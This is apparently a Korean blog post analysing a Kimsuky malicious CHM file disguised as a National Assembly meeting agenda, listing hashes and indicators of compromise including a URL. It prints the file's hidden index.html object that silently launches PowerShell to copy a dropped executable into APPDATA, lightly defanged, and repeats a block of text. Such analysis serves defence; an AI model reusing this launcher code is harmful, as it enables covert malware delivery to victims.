북한 해킹 단체 김수키(Kimsuky) 에서 만든 240903-회국회(정) 제1차 전체회의 의사일정안(결산,안건 상정,현안 보고)2024.8.1
Contents
오늘도 우리 이북 오도를 무단 점거를 하는 반국가 단체인 북한 해킹 단체 김수키(Kimsuky) 에서 만든 240903-회국회(정) 제1차 전체회의 의사일정안(결산,안건 상정,현안 보고)2024.8.11에 대해 글을 적어 보겠습니다.대한민국 국회 의사일정 공지를 하나 가져 와서 하려고 한 것을 보니 대충 국회의원과 그 보좌관들을 노린 것이 아닌가 생각이 됩니다.
악성코드 해쉬값
파일명:240903-회국회(정) 제1차 전체회의 의사일정안(결산,안건 상정,현안 보고).chm
사이즈:1.41 MB
MD5:f5f5a585a12df9cb406dde6b3e6da23d
SHA-1:e7197bb5c5363b56a1e33f333e6613f319458d77
SHA-256:3e0f4eaf3db754160f8c012a94772bf05b20823806962836fd0d32e0f160b916
이며 실행시키며 한국어도 아니고 영어도 아니고 일본어도 아닌 것을 즉 깨진 것을 볼 수가 있으며 여기서 파워셀이 실행이 되게 돼 있습니다.
여기서 핵심은 index.html 파일에 있습니다.
이것을 CyberChef(사이버 셰프)로 열면 다음과 같은 내용이 들어가 져 있는 것을 확인할 수가 있습니다.
여기서 Powershell을 실행을 하는 것을 볼 수가 있습니다.
HTML 내용
<bgsound src="Helpstore(.)exe"> <OBJECT id =qjswc classid="clsid:adb88(0)a6-d8ff-(1)1cf-(9)377-00aa003b7a11" width=1 height=1 style="display:none;"> <PARAM name = "Command" value="ShortCut"> <PARAM name = "Button" value="Bitmap::shortcut"> <PARAM name = "Item1" value=',cmd(.)exe,/c start /min /b powershell(.)exe -command "If (Test-Path \"$env:TEMP\") { Get-Ch(i)ldItem \"$env:TEMP\" -File | Where(-)Object { $_.Length -eq 159(6)928 } | ForEach-Ob(j)ect { Copy-Item -Pat(h) $_.FullName -Destinat(i)on \"$env:APPDATA\\Helpstore(.)exe\" -Force } }"'> </OBJECT> …
악성코드 해쉬값
파일명:240903-회국회(정) 제1차 전체회의 의사일정안(결산,안건 상정,현안 보고).chm
사이즈:1.41 MB
MD5:f5f5a585a12df9cb406dde6b3e6da23d
SHA-1:e7197bb5c5363b56a1e33f333e6613f319458d77
SHA-256:3e0f4eaf3db754160f8c012a94772bf05b20823806962836fd0d32e0f160b916
이며 실행시키며 한국어도 아니고 영어도 아니고 일본어도 아닌 것을 즉 깨진 것을 볼 수가 있으며 여기서 파워셀이 실행이 되게 돼 있습니다.
여기서 핵심은 index.html 파일에 있습니다.
이것을 CyberChef(사이버 셰프)로 열면 다음과 같은 내용이 들어가 져 있는 것을 확인할 수가 있습니다.
여기서 Powershell을 실행을 하는 것을 볼 수가 있습니다.
HTML 내용
<bgsound src="Helpstore(.)exe"> <OBJECT id =qjswc classid="clsid:adb88(0)a6-d8ff-(1)1cf-(9)377-00aa003b7a11" width=1 height=1 style="display:none;"> <PARAM name = "Command" value="ShortCut"> <PARAM name = "Button" value="Bitmap::shortcut"> <PARAM name = "Item1" value=',cmd(.)exe,/c start /min /b powershell(.)exe -command "If (Test-Path \"$env:TEMP\") { Get-Ch(i)ldItem \"$env:TEMP\" -File | Where(-)Object { $_.Length -eq 159(6)928 } | ForEach-Ob(j)ect { Copy-Item -Pat(h) $_.FullName -Destinat(i)on \"$env:APPDATA\\Helpstore(.)exe\" -Force } }"'> </OBJECT> …
IoC
3e0f4eaf3db754160f8c012a94772bf05b20823806962836fd0d32e0f160b916
86ef578ca5923119e65049f3d26bff7ea41cea12f8c425f06786b406c8dfaf9a
e7197bb5c5363b56a1e33f333e6613f319458d77
f00852dab6c6540bb6700d4e6ec43d6b61cd149ac395900b8b9eb5670a0be373
f5f5a585a12df9cb406dde6b3e6da23d
http://checker.jetos.com/l/siCTlD
86ef578ca5923119e65049f3d26bff7ea41cea12f8c425f06786b406c8dfaf9a
e7197bb5c5363b56a1e33f333e6613f319458d77
f00852dab6c6540bb6700d4e6ec43d6b61cd149ac395900b8b9eb5670a0be373
f5f5a585a12df9cb406dde6b3e6da23d
http://checker.jetos.com/l/siCTlD